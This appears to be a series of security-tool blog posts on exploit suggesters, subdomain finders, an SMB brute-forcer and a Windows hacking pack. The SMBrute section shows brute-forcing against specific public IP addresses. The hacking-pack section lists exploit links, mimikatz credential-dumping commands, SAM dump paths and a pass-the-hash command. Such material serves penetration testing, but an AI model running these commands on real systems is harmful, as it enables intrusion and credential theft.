                    [--string <string>] [--memstr <string>] [--depth <nbyte>]
                    [--only <key>] [--filter <key>] [--range <start-end>]
                    [--badbytes <byte>] [--rawArch <arch>] [--rawMode <mode>]
                    [--re <re>] [--offset <hexaddr>] [--ropchain] [--thumb]
                    [--console] [--norop] [--nojop] [--nosys] [--multibr]
                    [--all] [--dump]

optional arguments:
    -h, --help           show this help message and exit
    -v, --version        Display the ROPgadget's version
    -c, --checkUpdate    Checks if a new version is available
    --binary <binary>    Specify a binary filename to analyze
    --opcode <opcodes>   Search opcode in executable segment
    --string <string>    Search string in readable segment
    --memstr <string>    Search each byte in all readable segment
    --depth <nbyte>      Depth for search engine (default 10)
    --only <key>         Only show specific instructions
    --filter <key>       Suppress specific instructions
    --range <start-end>  Search between two addresses (0x...-0x...)
    --badbytes <byte>    Rejects specific bytes in the gadget's address
    --rawArch <arch>     Specify an arch for a raw file
    --rawMode <mode>     Specify a mode for a raw file
    --re <re>            Regular expression
    --offset <hexaddr>   Specify an offset for gadget addresses
    --ropchain           Enable the ROP chain generation
    --thumb              Use the thumb mode for the search engine (ARM only)
    --console            Use an interactive console for search engine
    --norop              Disable ROP search engine
    --nojop              Disable JOP search engine
    --callPreceded       Only show gadgets which are call-preceded (x86 only)
    --nosys              Disable SYS search engine
    --multibr            Enable multiple branch gadgets
    --all                Disables the removal of duplicate gadgets
    --dump               Outputs the gadget bytes

Screenshots







Linux Exploit Suggester - Linux Privilege Escalation Auditing Tool

April 18, 2018, 5:51 am
$
0
0

Often during the penetration test engagement the security analyst faces the problem of identifying privilege escalation attack vectors on tested Linux machine(s). One of viable attack vectors is using publicly known Linux exploit to gain root privileges on tested machine. Of course in order to do that the analyst needs to identify the right PoC exploit, make sure that his target is affected by the associated vulnerability and finally modify the exploit to suit his target. The linux-exploit-suggester.sh tool is designed to help with these activities.

Overview
The tool is meant to assist the security analyst in his testing for privilege escalation opportunities on Linux machine, it provides following features:

"Remote" mode (--kernel or --uname switches)
In this mode the analyst simply provides kernel version (--kernel switch) or uname -a command output (--uname switch) and receives list of candidate exploits for a given kernel version.
Using this mode one can also check for candidate user space exploits (with --pkglist-file switch) if he has access to installed packages listing (output of dpkg -l/rpm -qa commands) of examined system.

"Direct" mode (default run)
The basic idea behind this mode is the same as previously but additionally in an effort to produce more relevant list of candidate exploits, the tool also performs series of additional checks (like: kernel build settings aka CONFIG_*, sysctl entries and other custom checks) to rule out exploits that for sure won't be applicable due to OS customization. So for example for 'af_packet' exploit which requirements looks like this:
Reqs: pkg=linux-kernel,ver>=3.2,ver<=4.10.6,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
the script (in addition to checking kernel version) will check if target kernel was built with CONFIG_USER_NS and if sysctl entry kernel.unprivileged_userns_clone is enabled. Optionally those additional checks can by skipped by running with --skip-more-checkscommand line switch.
By default tool also checks for applicable user space exploits when distribution is one of Debian, Ubuntu, RHEL/CentOS/Fedora. To skip user space exploits checks one can run with --kernelspace-only switch.

"CVE list" mode (--cvelist-file switch)
In this mode the analyst already posesses partial/full list of CVEs that affects his target kernel and wants to verify if there are any publicly known exploits against this CVEs. Of course efectivness of this mode highly depends on completness of provided CVE list. Such list is usually constructed by manual study and examination of distribution's Changelog for the given kernel version. Alternatively for most popular distros Oracle's Ksplice Inspector could be used to speed up this proccess. For example following oneliner worked quite fine for me:
$ (uname -s; uname -m; uname -r; uname -v) | curl -s https://api-ksplice.oracle.com/api/1/update-list/ -L -H "Accept: text/text" --data-binary @- | grep CVE | tr ' ' '\n' | grep -o -E 'CVE-[0-9]+-[0-9]+' | sort -r -n | uniq
WARNING. By default in addition to comparing CVE IDs, this mode also performs additional checks to rule out exploits that won't be applicable due to OS customization (kernel build settings aka CONFIG_*, sysctl entries and other custom settings). So for the best possible results one should run it directly on tested machine or alternatively use --skip-more-checks command line switch if running on the target is not possible/not desired.

"Check security" mode (--checksec switch)
WARNING. This mode is in beta currently.
This mode is meant to be a modern continuation of checksec.sh's --kernel switch functionality.
In this mode linux-exploit-suggester.sh enumerates target system for various kernel/hardware security features (KASLR, SMEP, etc.) and settings. It checks if given protection mechanism is available (builtin into the kernel): [ Available ] and (if applicable) it check if it can be disabled/enabled without recompiling the kernel (via sysctl entry or other means): [ Enabled/Disabled ] or shows [ N/A] if disabling/enabling is not possible/not supported.

Tips, limitations, caveats
  • Remember that this script is only meant to assist the analyst in his auditing activities. It won't do the all work for him!
  • That's the analyst job to determine whether given target at hand isn't patched against generated list of candidate exploits (the script doesn't look at distro patchlevel so obviously it won't do that for you)
  • In addition to manual inspection Oracle's Ksplice Inspector could come handy with determining the previous one
  • Selected exploit almost certainly will need some customization to suit your target (at minimum: correct commit_creds/prepare_kernel_cred pointers) so knowledge about kernel exploitation techniques is required

Usage
Default run on target machine (kernel version, packages versions and additional checks as described in "Overview" paragraph are performed to give the list of possible exploits:
$ ./linux-exploit-suggester.sh
As previously but only userspace exploits are checked:
$ ./linux-exploit-suggester.sh --userspace-only
Check if exploit(s) for given list of CVE IDs are available:
$ ./linux-exploit-suggester.sh --cvelist-file <cve-listing-file> --skip-more-checks
Generate list of CVEs for the target kernel and check if exploit(s) for it exists (also performs additional checks):
$ (uname -s; uname -m; uname -r; uname -v) | curl -s https://api-ksplice.oracle.com/api/1/update-list/ -L -H "Accept: text/text" --data-binary @- | grep CVE | tr ' ' '\n' | grep -o -E 'CVE-[0-9]+-[0-9]+' | sort -r -n | uniq > <cve-listing-file>
$ ./linux-exploit-suggester.sh --cvelist-file <cve-listing-file>
List available hardware/kernel security mechanisms for target machine:
$ ./linux-exploit-suggester.sh --checksec
Running with -k option is handy if one wants to quickly examine which exploits could be potentially applicable for given kernel version (this is also compatibility mode with Linux_Exploit_Suggester):
$ ./linux-exploit-suggester.sh -k 3.1
With --uname one provides slightly more information (uname -a output from target machine) to linux-exploit-suggester.sh and receives slightly specific list of possible exploits (for example also target arch x86|x86_64 is taken into account when generating exploits list):
$ ./linux-exploit-suggester.sh --uname "Linux taris 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:43:14 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux"
Optionally --pkglist-file <file> could be provided to -k or --uname to also check for user space exploits:
(remote machine) $ dpkg -l > dpkgOutput.txt
$ ./linux-exploit-suggester.sh --uname "Linux taris 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:43:14 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux" --pkglist-file dpkgOutput.txt
In terms of generated list of exploits its identical with executing (directly on the given remote machine):
(remote machine) $ ./linux-exploit-suggester.sh --skip-more-checks
Sometimes it is desired to examine only package listing (in this case only check for userspace exploits is performed):
(remote machine) $ dpkg -l > dpkgOutput.txt
$ ./linux-exploit-suggester.sh --pkglist-file dpkgOutput.txt
As previously but no package versioning is performed (handy for quick preliminary checking if any package for which user space exploit is available is installed):
$ ./linux-exploit-suggester.sh --pkglist-file dpkgOutput.txt --skip-pkg-versions
Kernel version number is taken from current OS, sources for possible exploits are downloaded to current directory (only kernel space exploits are examined):
$ ./linux-exploit-suggester.sh --fetch-sources --kernelspace-only
Kernel version number is taken from command line, full details (like: kernel version requirements, comments and URL pointing to announcement/technical details about exploit) about matched exploits are listed:
$ ./linux-exploit-suggester.sh -k 4.1 --full
Kernel version number is taken from current OS, binaries for applicable exploits are downloaded (if available) to current directory, additional checks are skipped:
$ ./linux-exploit-suggester.sh --fetch-binaries --skip-more-checks
Note however that --fetch-binaries is not recommended as it downloads binaries from generally not trusted sources and most likely these binaries weren't compiled for your target anyway. It should be used as a kind of last resort option when you're running out of time during your pen testing engagement and there is no compiler available on your target at hand.

Misc
  • The tool was inspired by the Linux_Exploit_Suggester script and it contains all the exploits that are present there (for kernels 2.6+) plus all more recent Linux kernel exploits
  • It is available in BlackArch distribution
  • I'm not responsible for how the tool is used and where it is used

Quick download:
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh


Subfinder - Subdomain Discovery Tool That Can Discover Massive Amounts Of Valid Subdomains For Any Target

April 18, 2018, 1:46 pm
$
0
0

SubFinder is a subdomaindiscovery tool that uses various techniques to discover massive amounts of subdomains for any target. It has been aimed as a successor to the sublist3r project. SubFinder uses Passive Sources, Search Engines, Pastebins, Internet Archives, etc to find subdomains and then it uses a permutation module inspired by altdns to generate permutations and resolve them quickly using a powerful bruteforcing engine. It can also perform plain bruteforce if needed. The tool is highly customizable, and the code is built with a modular approach in mind making it easy to add functionalities and remove errors.

Why?
This project began it's life as a Bug Bounty World slack channel discussion. @ice3man & @codingo were talking about how the cornerstone subdomain tool at the time, sublist3r, appeared to have been abandoned. The goal of this project was to make a low dependancy, manageable project in Go that would continue to be maintained over time. @Ice3man decided to rewrite the sublist3r project and posted about it. @codingo offered to contribute to the project and subfinder was born.

Features
  • Simple and modular code base making it easy to contribute.
  • Fast And Powerful Bruteforcing Module (In Development)
  • Powerful Permutation generation engine. (In Development)
  • Many Passive Data Sources (CertDB, CertSpotter, crtsh, DNSDumpster, FindSubdomains, Hackertarget, Netcraft, PassiveTotal, PTRArchive, SecurityTrails, Threatcrowd, VirusTotal)
  • Internet Archives support for finding subdomains (In development)

Install
The installation is easy. Git clone the repo and run go build.
go get github.com/ice3man543/subfinder
To configure it to work with certain services, you need to have an API key for them. These are the services that do not work without an API key.
Put these values in the config.json file and you should be good to go.
If your $GOPATH is /home/go, make sure to place your config.json file in $GOPATH/bin folder or wherever you have the binary. Otherwise, it will not work.


Sandcat Browser 6.0 - Pentest And Developer-Oriented Web Browser

April 19, 2018, 5:46 am
$
0
0

Sandcat is a lightweight multi-tabbed web browser that combines the speed and power of Chromium and Lua. Sandcat comes with built-in live headers, an extensible user interface and command line console, resource viewer, and many other features that are useful for web developers and pen-testers and when you need to examine live web applications. For more details, visit http://www.syhunt.com/sandcat/. See also the docs directory and credits section below for a few more details about the Sandcat architecture.

Directories
  • /docs - Lua API documentation
  • /packs - contents of uncompressed pack files
  • /Common - common CSS, widgets and scripts package (Common.pak)
  • /Resources - resources package (Resources.pak)
  • /src - the main executable source and built-in resource files
  • /core - user interface source
  • /html - user interface resources (HTML)
  • /lua - Lua API source

Download
Compiled binaries for Windows can be downloaded from the links below.

Compiling
For compiling Sandcat, you will just need Catarinka and pLua.
The entire Sandcat user interface is created during runtime, so there is no need to install third-party components in the IDE - you can just add the dependencies listed above to the library path and hit compile. It compiles under Delphi 10 Seattle down to XE2. If you are trying to compile it with Lazarus, let me know which errors you get - I will try to do the same soon.
Some work is still needed before a Mac or Linux version materializes.

ChangeLog
  • Request Viewer rewrite - with better display of requests and stability fixes.
  • Disabled the Chromium’s XSS protection when in pentest mode.
  • Simplified the tabbed UI - major tab code clean up and reorganization.
  • Added drag and drop for items in the list editor.
  • Fixed: occasional crash when extension called events of Lua objects.
  • Additional stability.

Contact
Email: felipe at syhunt.com
If you want to report a security bug, please see the docs\SECURITY.md file.


PenCrawLer - An Advanced Web Crawler And DirBuster

April 19, 2018, 1:49 pm
$
0
0

An Advanced Web Crawler and DirBuster PeNCrawLer is an advanced webcrawler and dirbuster designed to using in penetration testing based on Windows Os.

Web Crawler Features:
  • Follow Redirects
  • Rendering Javascript
  • Extract links from custom HTML-Elements
  • Extract links with Regex-Pattern
  • Black-List extentions
  • White-List extentions
  • Downlaod files from white-list extentions
  • Setting-Up limit for crawling similar links
  • Searching for string in:
    • Url
    • Response
  • Automatic Form Submission
  • Support Http-Proxy
  • Supported Authentication:
    • Basic
    • Digest
  • Throttling mode


DirBuster Features:
  • Dictionary attack
  • Bruteforce attack
    • Custom bruteforce charset
  • Custom request method:
    • GET ONLY
    • Auto-Switch( GET and HEAD )
  • Recursive mode
  • Bruteforce directories
  • Bruteforce files with custom extentions
  • Automatic page detection by:
    • Failure status-code
    • Success status-code
    • Regex pattern
    • HTML source

SMBrute - SMB Protocol Bruteforce

April 20, 2018, 5:12 am
$
0
0

SMBrute is a program that can be used to bruteforce username and passwords of servers that are using SMB (Samba).

Install SMBrute
$ git clone https://github.com/m4ll0k/SMBrute.git smbrute
$ cd smbrute
$ pip3 install pysmb, humanfriendly
$ python3 smbrute.py

Usage:
$ python3 smbrute.py -h 188.10.73.147

 _____ _____ _____         _       
|   __|     | __  |___ _ _| |_ ___ 
|__   | | | | __ -|  _| | |  _| -_|
|_____|_|_|_|_____|_| |___|_| |___|

SMBrute - SMB Protocol Bruteforce
 Version 0.1.0
    Momo Outaadi (M4ll0k)

----------------------------------------
[+] Host 188.10.73.147 authentication disabled
[+] Showing folders..
------------------------------------------------
| Name       | Type | Comments                 |
------------------------------------------------
| Multimedia |    0 | System default share     |
| Download   |    0 | System default share     |
| Recordings |    0 | System default share     |
| Web        |    0 | System default share     |
| Public     |    0 | System default share     |
| homes      |    0 | System default share     |
| Archivio   |    0 |                          |
| FTP        |    0 | ftp                      |
| home       |    0 | Home                     |
| Qsync      |    0 | Qsync                    |
| IPC$       |    3 | IPC Service (NAS Server) |
------------------------------------------------

Show Files:
$ python3 smbrute.py -h 188.10.73.147 -f FTP

 _____ _____ _____         _       
|   __|     | __  |___ _ _| |_ ___ 
|__   | | | | __ -|  _| | |  _| -_|
|_____|_|_|_|_____|_| |___|_| |___|

SMBrute - SMB Protocol Bruteforce
 Version 0.1.0
    Momo Outaadi (M4ll0k)

----------------------------------------
[+] Host 188.10.73.147 authentication disabled
[+] Show FTP Files...
-----------------------------------------------------------
| Filename                                     | ReadOnly |
-----------------------------------------------------------
| .                                            | False    |
| ..                                           | False    |
| mLog_27_8_17__23_00_01.csv                   | False    |
| mLog_26_1_18__23_00_01.csv                   | False    |
| mLog_23_1_18__23_00_01.csv                   | False    |
| mLog_28_3_17__23_00_01.csv                   | False    |
| mLog_21_6_17__23_00_01.csv                   | False    |
-----------------------------------------------------------

Bruteforce Login:
$ python3 smbrute.py -h 2.35.69.44

 _____ _____ _____         _       
|   __|     | __  |___ _ _| |_ ___ 
|__   | | | | __ -|  _| | |  _| -_|
|_____|_|_|_|_____|_| |___|_| |___|

SMBrute - SMB Protocol Bruteforce
 Version 0.1.0
    Momo Outaadi (M4ll0k)

----------------------------------------
[-] Host 2.35.69.44 authentication enabled
[!] Please set wordlist for bruteforcing

$ python3 smbrute.py -h 2.35.69.44 -U user.txt -P pass.txt -t 10

 _____ _____ _____         _       
|   __|     | __  |___ _ _| |_ ___ 
|__   | | | | __ -|  _| | |  _| -_|
|_____|_|_|_|_____|_| |___|_| |___|

SMBrute - SMB Protocol Bruteforce
 Version 0.1.0
    Momo Outaadi (M4ll0k)

----------------------------------------
[-] Host 2.35.69.44 authentication enabled
[+] Start bruteforcing...
[+] Username: root Password: toor

After found credentials:
$ python3 smbrute.py -h 2.35.69.44 -u admin -p 1234

 _____ _____ _____         _       
|   __|     | __  |___ _ _| |_ ___ 
|__   | | | | __ -|  _| | |  _| -_|
|_____|_|_|_|_____|_| |___|_| |___|

SMBrute - SMB Protocol Bruteforce
 Version 0.1.0
    Momo Outaadi (M4ll0k)

----------------------------------------
[+] Host 2.35.69.44 authentication disabled
[+] Showing folders..
-----------------------------------------------------------------
| Name                   | Type | Comments                      |
-----------------------------------------------------------------
| IPC$                   |    3 | IPC Service (WDMyCloudEX2100) |
| Recycle Bin - Volume_1 |    0 | Recycle Bin Directories       |
| serverconf             |    0 |                               |
| deleghe2               |    0 |                               |
| prova                  |    0 |                               |
| ebcs_site              |    0 |                               |
| deleghe                |    0 |                               |
| confcatania2           |    0 |                               |
| backup                 |    0 |                               |
| doc                    |    0 | doc                           |
| ebcs                   |    0 | ebcs                          |
| foto                   |    0 | foto                          |
| pratiche               |    0 |                               |
| TimeMachineBackup      |    0 |                               |
| SmartWare              |    0 |                               |
| Public                 |    0 |                               |
-----------------------------------------------------------------


How Can Manufacturing Companies Improve Network Access and Security?

April 20, 2018, 2:16 pm
$
0
0

The manufacturing industry faces complex challenges other sectors of the economy need not worry about. Manufacturers rely heavily on everything from positive global economic trends to laws that lift certain burdens. And companies involved with manufacturing consistently focus on increased productivity with an eye for maintaining a cost-effective bottom line. While all these things present unique challenges. Arguably, among the most difficult challenges come from maximizing security on all levels. Computers, IT networks, and data storage locations must remain secure or else all kinds of chaos may reign down on a company. Taking steps to improve security must be a multi-faceted process. Anything left unsecured simply presents a troubling hazard. 

What contributes to security complexities in the manufacturing world? A simple answer would be "many things." One of the more specific reasons reveals itself when examining issues surrounding third-parties and manufacturing companies. Manufacturing companies do not exist as islands unto themselves.

Third-Party Concerns

Manufacturers do need to move and sell merchandise. Therefore, manufacturers maintain close relationships with distributors and vendors. To eliminate cumbersome steps and unwanted costs, third-parties may be given access to private networks and data in a manufacturing company. To speed up access, these third-parties might receive single sign on privileges. Clearly, the various third-party actors should not be accessing anything until the company has a strong permissions system in place. Controlling access and auditing those granted permissions could assist with any decisions to better enhance third-party security in the future.

Exploring the services offered by OneLogin reveals insight into how SSO and access management can be performed. Based in San Francisco, OneLogin assists many clients with access management needs. OneLogin has also published information on its website to contribute free advice on how to raise awareness about security and access management issues.

Don't Make Compromising Security Easy

Utilizing single sign on (SSO) programs does make it easier for everyone to log into a company's system. So, creating better and more complicated passwords makes sense since the sign on process has been made easier. And complicated, difficult-to-crack passwords deliver significant benefits to a manufacturing business worried about security. Stolen or otherwise compromised passwords and credentials account for a tremendous number of unauthorized breaches to a network. As shocking as it sounds, staff and management in many companies use highly-common and easily-guessable passwords. They also do not secure passwords. Writing down a password and leaving it on a desk or in a public place hardly cute down on the potential for unauthorized access.

Password and other credentials must be kept secure. Otherwise, security breach risks increase dramatically. As simple as this basic truism remains, people don't always heed the advice.

Beware of Hackers

Actually, manufacturing companies must do more than just be on the alert for hackers. Specific steps must be taken to protect computers and networks from hackers, viruses, and other risks capable fo threatening the system. Perhaps the time has arrived to bring in a security expert to perform a critical audit. If the audit reveals deficiencies, direct steps must be taken to close them up. Otherwise, an ajar or outright open security window exists to create easy access for troublemakers. Yes, there may be additional expenses required to boost computer and network security. These costs may be well worth the expense considering the protections they deliver.

Address Current Identity Management Issues

Certain identity management operational systems might be the same ones used by a company for years. The classic "support ticket" approach to dealing with network problems or concerns never seems to be upgraded at various businesses. While things may seem to be working fine, the slow, unproductive, and potentially costly nature of using an outdated system cries for an upgrade. When identity management issues run the risk of being improperly handled due to old and outdated approaches.

Upgrades should be performed at all levels of operations when appropriate. Companies such as OneLogin do strive to modernize access management in manufacturing and other industries. Looking at how this company works for inspiration might be worth the time commitment.



Search

JCS - Joomla Vulnerability Component Scanner

April 21, 2018, 6:26 am
$
0
0

JCS (Joomla Component Scanner) made for penetration testing purpose on Joomla CMS JCS can help you with the latest component vulnerabilities and exploits. The database can update from several resources and a Crawler has been implemented to find components and component's link.
This version supports Exploitdb and Packetstorm vulnerabilities to create a database for joomla components JCS can also create a Report in HTML for you.

Features:
  • Multi-Thread
  • Delay between requests
  • Custom Http Headers
  • Supports Http-Proxy
  • Supports Http Authentication:
    • BASIC
    • DIGEST
  • Component crawler base by Regex-Pattern
  • Component's Page Identification By:
    • Page Comparison
    • Regex Pattern
    • Searching in HTML tags example: <title>not found</title>
    • Checking Http Status Code

Report Sample:



RTA (Red Team Arsenal) - An Intelligent Scanner To Detect Security Vulnerabilities In Companies Layer 7 Assets

April 21, 2018, 2:49 pm
$
0
0

Red Team Arsenal is a web/network security scanner which has the capability to scan all company's online facing assets and provide an holistic security view of any security anomalies. It's a closely linked collections of security engines to conduct/simulate attacks and monitor public facing assets for anomalies and leaks.
It's an intelligent scanner detecting security anomalies in all layer 7 assets and gives a detailed report with integration support with nessus. As companies continue to expand their footprint on INTERNET via various acquisitions and geographical expansions, human driven security engineering is not scalable, hence, companies need feedback driven automated systems to stay put.

Installation

Supported Platforms
RTA has been tested both on Ubuntu/Debian (apt-get based distros) and as well as Mac OS. It should ideally work with any linux based distributions with mongo and python installed (install required python libraries from install/py_dependencies manually).

Prerequisites:
There are a few packages which are necessary before proceeding with the installation:
  • Git client: sudo apt-get install git
  • Python 2.7, which is installed by default in most systems
  • Python pip: sudo apt-get install python-pip
  • MongoDB: Read the official installation guide to install it on your machine.
Finally run python install/install.py
There are also optional packages/tools you can install (highly recommended):

Integrating Nessus:
Integrating Nessus into Red Team Arsenal can be done is simple 3 steps:
  • Download and install Nessus community edition (if you don’t have a paid edition). If you already have an installation (it can be remote installation as well), then go to step (2).
  • Update the config file (present on the root directory of RTA) with Nessus URL, username and password.
  • Create a nessus policy where you can configure the type of scans and plugins to run and name it RTA (Case sensitive - use full uppercase).
  • Once the config file has the correct Nessus information (url, username, password), use the flag --nessus while running RTA to launch nessus scan over the entire subdomains gathered by RTA (one single scan initiated with all the subdomains gathered).

Usage
Short FormLong FormDescription
-u--urlDomain URL to scan
-v--verboseEnable the verbose mode and display results in realtime
-n--nessusLaunch a Nessus scan with all the subdomains
-s--scraperRun scraper based on config keywords
-h--helpshow the help message and exit

Sample Output
a0xnirudh@exploitbox /RTA (master*) $ python rta.py --url "0daylabs.com" -v -s

              ____          _   _____                         _                              _
             |  _ \ ___  __| | |_   _|__  __ _ _ __ ___      / \   _ __ ___  ___ _ __   __ _| |
             | |_) / _ \/ _` |   | |/ _ \/ _` | '_ ` _ \    / _ \ | '__/ __|/ _ \ '_ \ / _` | |
             |  _ <  __/ (_| |   | |  __/ (_| | | | | | |  / ___ \| |  \__ \  __/ | | | (_| | |
             |_| \_\___|\__,_|   |_|\___|\__,_|_| |_| |_| /_/   \_\_|  |___/\___|_| |_|\__,_|_|


[i] Checking for Zonetransfer
[i] Zone Transfer is not enabled

[i] Checking for SPF records
[+] SPF record lookups is good. Current value is: 9

[-] Enumerating subdomains now for 0daylabs.com
[-] Searching now in Baidu..
[-] Searching now in Yahoo..
[-] Searching now in Google..
[-] Searching now in Bing..
[-] Searching now in Ask..
[-] Searching now in Netcraft..
[-] Searching now in DNSdumpster..
[-] Searching now in Virustotal..
[-] Searching now in ThreatCrowd..
[-] Searching now in SSL Certificates..
[-] Searching now in PassiveDNS..
[-] Total Unique Subdomains Found: 3
blog.0daylabs.com
www.0daylabs.com
test.0daylabs.com

[+] Verifying Subdomains and takeover options

[+] Possible subdomain takeovers (Manual verification required):

 test.0daylabs.com

[i] Verified and Analyzed Subdomains:

[i] URL: blog.0daylabs.com
[i] Wappalyzer: [u'jQuery', u'Varnish', u'Font Awesome', u'Twitter Bootstrap', u'Google Analytics', u'Google Font API', u'Disqus', u'Google AdSense']

[i] Scraper Results

[+] Shodan
Hostname: test.0daylabs.com                 IP: 139.59.63.111       Ports: 179
Hostname: test.0daylabs.com                 IP: 139.59.63.111       Ports: 179

[+] Twitter
URL: https://twitter.com/tweetrpersonal9/status/832624003751694340      search string: 0daylabs
URL: https://twitter.com/ratokeshi/status/823957535564644355            search string: 0daylabs

Notifications

Configuring Slack:
RTA can also do push notifications to slack which includes the main scan highlight along with Nessus and other integrated scanner reports divided on the basis of severity.
  • In your slack, create an incoming webhook and point it to the channel where you need the RTA to send the report. You can read more about creating incoming webhooks on slack documentation.
  • In the config file, update the URL in the slack section with full URL (including https://) for the incoming webhook.
Once slack is configured, you will automatically start getting reports on your configured slack channel

Roadmap
Here are couple of ideas which we have in mind to do going ahead with RTA. If you have any ideas/feature requests which is not listed below, feel free to raise an issue in github.
  • Email the results once the scan is completed.
  • Extend the current RTA API so that we can launch custom scans with required options via the API.
  • Launch custom scans based on Wappalyzer results (eg: wpscan if wordpress is detected)
  • Investigate and integrate more web security scanners including but not limited to Arachni, Wapiti, Skipfish and others !
  • JSON/XML output formatting for the RTA scan result.
  • Improving the logic for Subdomain takeover.
  • Multi threading support for faster scan comple.

Contributors
Awesome people who built this project:

Lead Developers:
Anirudh Anand (@a0xnirudh)

Project Contributors:
Mohan KK (@MohanKallepalli)
Ankur Bhargava (@_AnkurB)
Prajal Kulkarni (@prajalkulkarni)
Himanshu Kumar Das (@mehimansu)

Special Thanks
Sublist3r


Eternal Check - Ip Vulnerability Check To Eternal Blue, Romance, Synergy & Champion

April 22, 2018, 6:36 am
$
0
0

Ip Vulnerability Check To Eternal Blue, Romance, Synergy & Champion:

Eternal Check
  • Eternal Check verifies if an ip is vulnerable to the smb vulnerabilities
  • Eternal Blue
  • Eternal Romance
  • Eternal champion
  • Eternal synergy

Screenshots



Eternal Check Running (Video)


Requirements
  • nmap
  • winbind
  • wine32
  • wget
  • Aditional info in how to install wine 32bit on a 64bit machine : https://wiki.debian.org/Wine to know how to install wine32 on a 64bit machine

Usage
  • example 1 : ./echeck
  • example 2 : ./echeck 192.68.2.56

Important
  • Do not expect much support or any at all

Last Notes (References of these vulnerabilities)


WHP - Microsoft Windows Hacking Pack

April 22, 2018, 2:33 pm
$
0
0 

M$ Windows Hacking Pack
===========

Tools here are from different sources. The repo is generally licensed with WTFPL, but some content may be not (eg. sysinternals).
"pes" means "PE Scambled". It's useful sometimes.


Remote Exploits
===========

Windows 2000 / XP SP1
MS05-039 Microsoft Plug and Play Service Overflow, Works with SSDP too
http://www.rapid7.com/db/modules/exploit/windows/smb/ms05_039_pnp


Windows XP/NT (beofre SP2)
MS03-026  Microsoft RPC DCOM Interface Overflow (kaht2.zip)
http://www.securityfocus.com/bid/8205/exploit


Windows XP (SP2 and SP3) (can be used also for priv esc)
MS08-067 Remote Stack Overflow Vulnerability Exploit (srvscv)
https://www.exploit-db.com/exploits/7104/


Windows Windows 7 and Server 2008 R2 (x64) All Service Packs
MS17-010 aka "Eternal Blue"
https://github.com/RiskSense-Ops/MS17-010


Windows Server 2016 (DoS, may lead to exec)
"Fuzzing SMB" video, showing the crash: https://www.youtube.com/watch?v=yDae5-lIQb8



Privilege Escalation
===========

First, if you have meterpreter, it may be a good idea to try "getsystem".


srvcheck3.exe
=====
Privilege escalation for Windows XP SP2 and before
This can exploit vulnerable services. http://seclists.org/fulldisclosure/2006/Feb/231
Example: srvcheck3.exe -m upnphost -H 127.0.0.1 -c "cmd.exe /c c:\Inetpub\wwwroot\shell.exe"


KiTrap0D.tar
=====
Privilege escalation for Microsoft Windows NT/2000/XP/2003/Vista/2008/7
MS10-015 / CVE-2010-0232 / https://www.exploit-db.com/exploits/11199/


Other ways of exploits listed
=====
Windows XP/2003
MS11-080  → Local Privilege Escalation Exploit  Afd.sys
https://www.exploit-db.com/exploits/18176/


Windows Vista/7 
CVE: 2010-4398  Elevation of Privileges (UAC Bypass) 
http://www.securityfocus.com/bid/45045/exploit


Windows 8.1 (and before)
MS14-058 → TrackPopupMenu Privilege Escalation
https://www.exploit-db.com/exploits/37064/


Windows 8.1 (and before)
MS15-051 Win32k LPE vulnerability used in APT attack "taihou32"
https://www.exploit-db.com/exploits/37049/


Windows 10 (and before)
Hot Potato (nbns spoof + wpad + smb ntlm)
http://foxglovesecurity.com/2016/01/16/hot-potato/


Windows 10 (and before)
Link/URL based exploitation of NetNTLM hashes. Eg. sending link file in email or dropping on file share.
Technique presented here: https://www.youtube.com/watch?v=cuF_Ibo-mmM

Windows XP SP2 (and before)
srvcheck3.exe - upnp service or SSDPSRV service 


Windows XP/2003
MS11-080  → Local Privilege Escalation Exploit  Afd.sys
https://www.exploit-db.com/exploits/18176/


Windows Vista/7 
CVE: 2010-4398  Elevation of Privileges (UAC Bypass) 
http://www.securityfocus.com/bid/45045/exploit


Windows 8.1 (and before)
MS14-058 → TrackPopupMenu Privilege Escalation
https://www.exploit-db.com/exploits/37064/


Windows 8.1 (and before)
MS15-051 Win32k LPE vulnerability used in APT attack "taihou32"
https://www.exploit-db.com/exploits/37049/


Windows NT/2K/XP/2K3/Vista/2K8/7/8
KiTrap0D - EPATHOBJ Local Ring Exploit
https://www.exploit-db.com/exploits/11199/


Windows 10 (and before)
Hot Potato (nbns spoof + wpad + smb ntlm)
http://foxglovesecurity.com/2016/01/16/hot-potato/


Windows XP (and after)
.lnk exploit for receiving NetNTLM hashes remotely.
https://www.youtube.com/watch?v=cuF_Ibo-mmM


Backup files if contain sam
Windows/system32/config/SAM
/WINDOWS/repair/SAM
regedit.exe HKEY_LOCAL_MACHINE -> SAM

Tools to get the SAM database if locked: pwdump, samdump, samdump2, Cain&Abel
Otherwise just copy.


Dump SAM through shadow volume
If it can be created the database could be copied from this.
Vista command: vssadmin create shadow
Server 2008 command: diskshadow


Windows Credentials Editor
WCE / Windows Credentials Editor can recover password hashes from LSASS - http://www.ampliasecurity.com/research/wcefaq.html
WCE supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions). 


Mimikatz dumping
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam


Cachedump aka In-memory attacks for SAM hashes / Cached Domain Credentials
fgdump.exe (contains pwdump and cachedump, can read from memory)


SAM dump (hive)
"A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data."


Dump SAM, then spray hashes
keimpx (try hashes with different users, against domain accounts)
http://code.google.com/p/keimpx/


LSA dumping (memory) / Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP
LSAdump2, LSASecretsDump, pwdumpx, gsecdump or Cain & Abel
https://github.com/CoreSecurity/impacket
http://packetstormsecurity.org/files/view/10457/lsadump2.zip
http://www.nirsoft.net/utils/lsa_secrets_dump.html
http://packetstormsecurity.org/files/view/62371/PWDumpX14.zip


PassTheHash (before Windows 8.1)
pth-winexe --user=pc.local/Administrator%aad3b435b51404eeaad3b435b514t234e:1321ae011e02ab0k26e4edc5012deac8 //10.1.1.1 cmd


PassTheTicket (Kerberos)
mimikatz can do it


Duplicate Access Tokens (if admin access token can be used, it's win)
http://sourceforge.net/projects/incognito/


Token "Kidnapping"
MS 09-12, Churrasco.bin shell.bin (runs shell.bin with nt system authority)
